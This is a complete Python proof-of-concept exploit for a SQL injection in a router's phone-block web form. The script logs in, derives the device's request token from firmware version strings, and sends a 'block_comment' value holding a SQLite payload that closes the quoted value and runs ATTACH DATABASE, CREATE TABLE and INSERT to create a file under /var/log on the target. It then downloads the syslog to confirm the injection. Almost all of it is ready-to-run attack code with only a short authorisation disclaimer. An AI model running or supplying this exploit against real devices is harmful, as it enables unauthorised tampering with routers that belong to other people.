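"""Proof-of-concept for a SQL injection in a router's phone-block form.

Flow (see the ``__main__`` section): log in through
``/goform/goform_set_cmd_process``, submit a ``PHONE_BLOCK_ADD`` request whose
``block_comment`` field carries a SQLite ``ATTACH DATABASE`` payload pointing at
``/var/log/webshow_messages``, then pull the exported syslog from
``/cgi-bin/ExportSyslog.sh`` so the injected marker can be looked for.

Only run this against devices you are authorised to test: the payload creates
a file on the target's filesystem and the script leaves it there.

Module globals ``HOST``, ``HDRS`` and ``PASSWD`` are assigned from the command
line in the ``__main__`` section; the functions below read them at call time.
"""

import base64
import hashlib
import sys
import time

import requests

# Firmware version strings that feed the "AD" request token (see get_AD()).
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"

# Seconds to wait for the device on every request. The original passed no
# timeout at all, so an unresponsive target hung the script forever.
TIMEOUT = 15

# Marker value placed in the form and in the injected row; get_log() is meant
# to show whether it reached the log file.
MARKER = "testestesttest"


def FORM(goform_id):
    """Return the base fields every goform request carries."""
    return {"isTest": False, "goformId": goform_id}


# One session so the cookie set by login() is sent on every later request.
s = requests.Session()


def _md5(text):
    """Hex MD5 of ``text`` encoded as UTF-8 (the AD token is nested MD5s)."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def login():
    """Authenticate to the device with the base64-encoded password in PASSWD.

    Returns True when the device answers with ``"result": "0"``. A transport
    error, a non-JSON body or any other result value counts as a failed login
    and returns False, so the caller can stop before sending the payload.
    """
    data = FORM("LOGIN")
    data["password"] = PASSWD
    try:
        resp = s.post(
            f"{HOST}/goform/goform_set_cmd_process",
            headers=HDRS,
            data=data,
            timeout=TIMEOUT,
        )
        result = resp.json().get("result")
    except (requests.RequestException, ValueError) as exc:
        # ValueError covers requests' JSON decode error for non-JSON replies.
        print(f"[+] Login: fail ({exc})")
        return False
    ok = result == "0"
    print("[+] Login: " + ("success" if ok else "fail"))
    return ok


def get_AD():
    """Compute the ``AD`` token the device expects on set-cmd posts.

    The token is md5(md5(wa_inner_version + cr_version) + RD), where RD is
    read from the device's ``cmd=RD`` reply. The RD request goes through the
    shared session (the original used a bare ``requests.get``, which sent no
    login cookie) so it behaves like every other request in this script.

    Raises KeyError if the JSON reply carries no ``RD`` field.
    """
    version_hash = _md5(wa_inner_version + cr_version)
    rd = s.get(
        f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
        headers=HDRS,
        timeout=TIMEOUT,
    )
    return _md5(version_hash + rd.json()["RD"])


def get_response(server_resp):
    """Print whether the device reported success for the injection post.

    Returns True when the literal ``success`` appears anywhere in the response
    body. This is a heuristic: the reply format is not parsed, so a body that
    merely mentions the word is also counted as success.
    """
    ok = "success" in server_resp.text
    print("[+] payload injected: " + ("success" if ok else "fail"))
    return ok


def sqli():
    """Submit the PHONE_BLOCK_ADD form with the SQLite injection payload.

    ``block_comment`` starts with ``test')`` (presumably closing the quoted
    value in the device's own INSERT), then ATTACHes a database at ``target``,
    creates table ``pwn`` in it, inserts MARKER and comments out the rest with
    ``--``. Needs a logged-in session and a freshly computed AD token.
    """
    target = "/var/log/webshow_messages"
    form = FORM("PHONE_BLOCK_ADD")
    form["block_number"] = MARKER
    form["block_comment"] = (
        f"test'); ATTACH DATABASE '{target}' AS t; "
        f"CREATE TABLE t.pwn (dataz text);"
        f"INSERT INTO t.pwn (dataz) VALUES ('{MARKER}');--"
    )
    form["AD"] = get_AD()
    resp = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=form,
        timeout=TIMEOUT,
    )
    get_response(resp)


def get_log():
    """Fetch the exported syslog, print it and save it to last-log.txt.

    An empty export is reported explicitly instead of being silently skipped.
    The file is written as UTF-8 so non-ASCII log content cannot raise on
    platforms with a narrower default encoding.
    """
    logs = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS, timeout=TIMEOUT)
    if not logs.text:
        print("[-] Empty syslog export")
        return
    print(logs.text)
    print("[+] Logs written into last-log.txt")
    with open("last-log.txt", "w", encoding="utf-8") as logf:
        logf.write(logs.text)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        # Both the device base URL (scheme included) and the password are read below.
        print("usage: python3 run.py http://<host> <password>")
        sys.exit(1)
    # Strip a trailing slash so the f-strings above do not build "//goform/...".
    HOST = sys.argv[1].rstrip("/")
    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        # Origin/Referer point at the device itself; presumably it checks them.
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }
    # The login form is sent the password base64-encoded rather than in clear.
    PASSWD = base64.b64encode(sys.argv[2].encode()).decode()
    # Do not fire the payload when authentication failed; the original carried on.
    if not login():
        sys.exit(1)
    sqli()
    get_log()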